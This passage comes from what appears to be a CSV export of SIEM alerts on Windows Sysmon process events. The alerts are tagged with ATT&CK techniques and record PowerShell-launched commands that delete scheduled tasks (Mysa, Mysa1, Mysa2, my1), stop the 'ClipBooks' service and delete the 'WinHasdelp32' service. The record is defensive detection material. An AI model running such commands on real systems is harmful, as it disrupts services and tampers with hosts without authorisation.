Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.308",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.960 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010fbc62600} +ProcessId: 7924 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.964907500Z"",""eventRecordID"":""3035"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.960\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010fbc62600}\r\nProcessId: 7924\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.960"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010fbc62600}"",""processId"":""7924"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.294",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.923 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001020c52600} +ProcessId: 7284 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.926858300Z"",""eventRecordID"":""3034"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.923\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001020c52600}\r\nProcessId: 7284\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.923"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-001020c52600}"",""processId"":""7284"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.278",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.867 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00107dc32600} +ProcessId: 1520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.880547600Z"",""eventRecordID"":""3033"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.867\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00107dc32600}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.867"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-00107dc32600}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.995",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.759 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010d4c12600} +ProcessId: 7264 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.764680700Z"",""eventRecordID"":""3032"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.759\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010d4c12600}\r\nProcessId: 7264\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.759"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010d4c12600}"",""processId"":""7264"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.948",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.687 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010b4bd2600} +ProcessId: 7404 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.690405200Z"",""eventRecordID"":""3030"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.687\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010b4bd2600}\r\nProcessId: 7404\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.687"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010b4bd2600}"",""processId"":""7404"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.909",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.644 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010acbb2600} +ProcessId: 7636 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.655473400Z"",""eventRecordID"":""3028"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.644\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010acbb2600}\r\nProcessId: 7636\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.644"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010acbb2600}"",""processId"":""7636"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.887",8,"ATT&CK T1489: 